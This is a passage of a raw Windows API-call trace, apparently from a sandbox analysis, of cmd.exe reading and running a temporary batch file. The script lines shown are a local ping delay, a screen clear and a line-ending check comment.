_wcsicmp (_String1="REM/?", _String2="echo:") returned 13 [0175.232] GetProcessHeap () returned 0x19a8f1e0000 [0175.232] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0175.232] GetProcessHeap () returned 0x19a8f1e0000 [0175.232] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1c) returned 0x19a8f1eb950 [0175.232] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.232] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x99e [0175.232] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea40, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea40*=0x1fff, lpOverlapped=0x0) returned 1 [0175.232] SetFilePointer (in: hFile=0x94, lDistanceToMove=2484, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b4 [0175.232] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="ping 127.0.0.1 -n 10\r\n", cbMultiByte=22, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="ping 127.0.0.1 -n 10\r\nleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 22 [0175.232] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.232] GetFileType (hFile=0x94) returned 0x1 [0175.233] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.233] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b4 [0175.233] GetProcessHeap () returned 0x19a8f1e0000 [0175.233] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.233] GetProcessHeap () returned 0x19a8f1e0000 [0175.233] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.233] GetProcessHeap () returned 0x19a8f1e0000 [0175.233] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee0d0 [0175.233] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0175.233] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0175.233] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0175.233] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0175.233] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0175.233] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0175.234] GetProcessHeap () returned 0x19a8f1e0000 [0175.234] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edd10 [0175.234] GetProcessHeap () returned 0x19a8f1e0000 [0175.234] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1a) returned 0x19a8f1eb6e0 [0175.234] GetProcessHeap () returned 0x19a8f1e0000 [0175.234] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e08b0 [0175.234] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.234] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b4 [0175.234] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efea10, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efea10*=0x1fff, lpOverlapped=0x0) returned 1 [0175.234] SetFilePointer (in: hFile=0x94, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0175.234] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=")\r\ng 127.0.0.1 -n 10\r\nleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 3 [0175.234] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.234] GetFileType (hFile=0x94) returned 0x1 [0175.234] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.234] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0175.234] GetProcessHeap () returned 0x19a8f1e0000 [0175.234] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fa1a0 [0175.234] GetProcessHeap () returned 0x19a8f1e0000 [0175.235] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa1a0) returned 1 [0175.235] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0175.235] _tell (_FileHandle=3) returned 2487 [0175.236] _close (_FileHandle=3) returned 0 [0175.236] wcstol (in: _String="0", _EndPtr=0x43f9efee70, _Radix=0 | out: _EndPtr=0x43f9efee70*="") returned 0 [0175.236] wcstol (in: _String="0", _EndPtr=0x43f9efee78, _Radix=0 | out: _EndPtr=0x43f9efee78*="") returned 0 [0175.236] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.236] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.237] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.237] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.237] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.237] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.238] SetConsoleInputExeNameW () returned 0x1 [0175.238] GetConsoleOutputCP () returned 0x1b5 [0175.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.239] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.239] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.239] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.239] SetFilePointer (in: hFile=0x94, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0175.239] GetProcessHeap () returned 0x19a8f1e0000 [0175.240] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e08b0) returned 1 [0175.240] GetProcessHeap () returned 0x19a8f1e0000 [0175.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0175.241] GetProcessHeap () returned 0x19a8f1e0000 [0175.241] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0175.241] GetProcessHeap () returned 0x19a8f1e0000 [0175.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0175.242] GetProcessHeap () returned 0x19a8f1e0000 [0175.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0175.242] GetProcessHeap () returned 0x19a8f1e0000 [0175.242] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0175.242] GetProcessHeap () returned 0x19a8f1e0000 [0175.243] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0175.245] GetProcessHeap () returned 0x19a8f1e0000 [0175.245] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0175.245] GetProcessHeap () returned 0x19a8f1e0000 [0175.246] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee790) returned 1 [0175.246] GetProcessHeap () returned 0x19a8f1e0000 [0175.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0175.247] GetProcessHeap () returned 0x19a8f1e0000 [0175.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaf50) returned 1 [0175.247] GetProcessHeap () returned 0x19a8f1e0000 [0175.247] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0175.248] GetProcessHeap () returned 0x19a8f1e0000 [0175.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0175.248] GetProcessHeap () returned 0x19a8f1e0000 [0175.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0175.248] GetProcessHeap () returned 0x19a8f1e0000 [0175.248] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb7a0) returned 1 [0175.249] GetProcessHeap () returned 0x19a8f1e0000 [0175.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0175.249] GetProcessHeap () returned 0x19a8f1e0000 [0175.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee610) returned 1 [0175.249] GetProcessHeap () returned 0x19a8f1e0000 [0175.249] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0175.250] GetProcessHeap () returned 0x19a8f1e0000 [0175.250] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee550) returned 1 [0175.250] GetProcessHeap () returned 0x19a8f1e0000 [0175.252] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee490) returned 1 [0175.252] GetProcessHeap () returned 0x19a8f1e0000 [0175.252] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0175.252] GetProcessHeap () returned 0x19a8f1e0000 [0175.252] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0175.252] GetProcessHeap () returned 0x19a8f1e0000 [0175.252] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0175.252] GetProcessHeap () returned 0x19a8f1e0000 [0175.253] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0175.253] GetProcessHeap () returned 0x19a8f1e0000 [0175.253] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0175.253] GetProcessHeap () returned 0x19a8f1e0000 [0175.253] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee310) returned 1 [0175.253] GetProcessHeap () returned 0x19a8f1e0000 [0175.253] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0175.253] GetProcessHeap () returned 0x19a8f1e0000 [0175.253] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecb40) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecaa0) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec720) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec800) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.254] GetProcessHeap () returned 0x19a8f1e0000 [0175.254] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee6d0) returned 1 [0175.255] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.255] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0175.255] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.255] SetFilePointer (in: hFile=0x94, lDistanceToMove=2492, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bc [0175.255] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="cls\r\n127.0.0.1 -n 10\r\nleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 5 [0175.255] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.255] GetFileType (hFile=0x94) returned 0x1 [0175.255] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.255] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bc [0175.255] GetProcessHeap () returned 0x19a8f1e0000 [0175.255] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.255] GetProcessHeap () returned 0x19a8f1e0000 [0175.256] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.256] _wcsicmp (_String1="cls", _String2=")") returned 58 [0175.256] _wcsicmp (_String1="FOR", _String2="cls") returned 3 [0175.256] _wcsicmp (_String1="FOR/?", _String2="cls") returned 3 [0175.256] _wcsicmp (_String1="IF", _String2="cls") returned 6 [0175.256] _wcsicmp (_String1="IF/?", _String2="cls") returned 6 [0175.256] _wcsicmp (_String1="REM", _String2="cls") returned 15 [0175.256] _wcsicmp (_String1="REM/?", _String2="cls") returned 15 [0175.256] GetProcessHeap () returned 0x19a8f1e0000 [0175.256] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee910 [0175.256] GetProcessHeap () returned 0x19a8f1e0000 [0175.256] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1e5950 [0175.256] _tell (_FileHandle=3) returned 2492 [0175.257] _close (_FileHandle=3) returned 0 [0175.257] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0175.257] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0175.257] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0175.257] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0175.257] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0175.257] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0175.257] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0175.257] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0175.257] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0175.257] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0175.257] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0175.257] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0175.257] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0175.257] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0175.257] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0175.257] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0175.257] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0175.257] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0175.258] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0175.258] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0175.258] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0175.258] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0175.258] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0175.258] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0175.258] _wcsicmp (_String1="cls", _String2="DIR") returned -1 [0175.258] _wcsicmp (_String1="cls", _String2="ERASE") returned -2 [0175.258] _wcsicmp (_String1="cls", _String2="DEL") returned -1 [0175.258] _wcsicmp (_String1="cls", _String2="TYPE") returned -17 [0175.259] _wcsicmp (_String1="cls", _String2="COPY") returned -3 [0175.259] _wcsicmp (_String1="cls", _String2="CD") returned 8 [0175.259] _wcsicmp (_String1="cls", _String2="CHDIR") returned 4 [0175.259] _wcsicmp (_String1="cls", _String2="RENAME") returned -15 [0175.259] _wcsicmp (_String1="cls", _String2="REN") returned -15 [0175.259] _wcsicmp (_String1="cls", _String2="ECHO") returned -2 [0175.259] _wcsicmp (_String1="cls", _String2="SET") returned -16 [0175.259] _wcsicmp (_String1="cls", _String2="PAUSE") returned -13 [0175.259] _wcsicmp (_String1="cls", _String2="DATE") returned -1 [0175.259] _wcsicmp (_String1="cls", _String2="TIME") returned -17 [0175.259] _wcsicmp (_String1="cls", _String2="PROMPT") returned -13 [0175.259] _wcsicmp (_String1="cls", _String2="MD") returned -10 [0175.259] _wcsicmp (_String1="cls", _String2="MKDIR") returned -10 [0175.259] _wcsicmp (_String1="cls", _String2="RD") returned -15 [0175.259] _wcsicmp (_String1="cls", _String2="RMDIR") returned -15 [0175.259] _wcsicmp (_String1="cls", _String2="PATH") returned -13 [0175.259] _wcsicmp (_String1="cls", _String2="GOTO") returned -4 [0175.259] _wcsicmp (_String1="cls", _String2="SHIFT") returned -16 [0175.259] _wcsicmp (_String1="cls", _String2="CLS") returned 0 [0175.259] GetProcessHeap () returned 0x19a8f1e0000 [0175.259] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x14) returned 0x19a8f1ec8a0 [0175.259] GetProcessHeap () returned 0x19a8f1e0000 [0175.259] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecda0 [0175.260] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.260] GetFileType (hFile=0x24) returned 0x2 [0175.260] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.260] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efe9a8 | out: lpMode=0x43f9efe9a8) returned 1 [0175.261] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.261] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x24, lpConsoleScreenBufferInfo=0x43f9efe9e0 | out: lpConsoleScreenBufferInfo=0x43f9efe9e0) returned 1 [0175.261] ScrollConsoleScreenBufferW (hConsoleOutput=0x24, lpScrollRectangle=0x43f9efe9d8, lpClipRectangle=0x0, dwDestinationOrigin=0xdcd70000, lpFill=0x43f9efe9d4) returned 1 [0175.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0175.269] SetConsoleCursorPosition (hConsoleOutput=0x24, dwCursorPosition=0x0) returned 1 [0175.269] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.269] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0175.269] _get_osfhandle (_FileHandle=1) returned 0x24 [0175.269] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0175.270] _get_osfhandle (_FileHandle=0) returned 0x20 [0175.270] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0175.270] SetConsoleInputExeNameW () returned 0x1 [0175.270] GetConsoleOutputCP () returned 0x1b5 [0175.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0175.271] SetThreadUILanguage (LangId=0x0) returned 0x409 [0175.271] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.271] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.271] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.271] SetFilePointer (in: hFile=0x94, lDistanceToMove=2492, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bc [0175.271] GetProcessHeap () returned 0x19a8f1e0000 [0175.271] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecda0) returned 1 [0175.271] GetProcessHeap () returned 0x19a8f1e0000 [0175.272] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8a0) returned 1 [0175.272] GetProcessHeap () returned 0x19a8f1e0000 [0175.272] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5950) returned 1 [0175.272] GetProcessHeap () returned 0x19a8f1e0000 [0175.272] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0175.272] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.272] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bc [0175.273] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.273] SetFilePointer (in: hFile=0x94, lDistanceToMove=2494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9be [0175.273] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ns\r\n127.0.0.1 -n 10\r\nleshoot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 2 [0175.273] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.273] GetFileType (hFile=0x94) returned 0x1 [0175.273] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.273] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9be [0175.273] GetProcessHeap () returned 0x19a8f1e0000 [0175.273] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.273] GetProcessHeap () returned 0x19a8f1e0000 [0175.274] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.274] _tell (_FileHandle=3) returned 2494 [0175.274] _close (_FileHandle=3) returned 0 [0175.274] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.274] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.274] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.274] SetFilePointer (in: hFile=0x94, lDistanceToMove=2494, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9be [0175.274] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.274] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9be [0175.275] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.275] SetFilePointer (in: hFile=0x94, lDistanceToMove=2520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d8 [0175.275] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check LF line ending\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Check LF line ending\r\noot.html\r\nript may crash...\r\nr the batch script\r\n===============================================================\r\n") returned 26 [0175.275] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.275] GetFileType (hFile=0x94) returned 0x1 [0175.275] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.275] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d8 [0175.275] GetProcessHeap () returned 0x19a8f1e0000 [0175.275] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fc1b0 [0175.275] GetProcessHeap () returned 0x19a8f1e0000 [0175.276] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fc1b0) returned 1 [0175.276] _tell (_FileHandle=3) returned 2520 [0175.276] _close (_FileHandle=3) returned 0 [0175.276] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94 [0175.277] _open_osfhandle (_OSFileHandle=0x94, _Flags=8) returned 3 [0175.277] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.277] SetFilePointer (in: hFile=0x94, lDistanceToMove=2520, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d8 [0175.277] _get_osfhandle (_FileHandle=3) returned 0x94 [0175.277] SetFilePointer (in: hFile=0x94, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d8 [0175.277] ReadFile (in: hFile=0x94, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0175.277] SetFilePointer (in: hFile=0x94, lDistanceToMove=2522, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9da [0175.277] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Check LF line ending\r\noot.html\r\nript may crash...\r\nr the 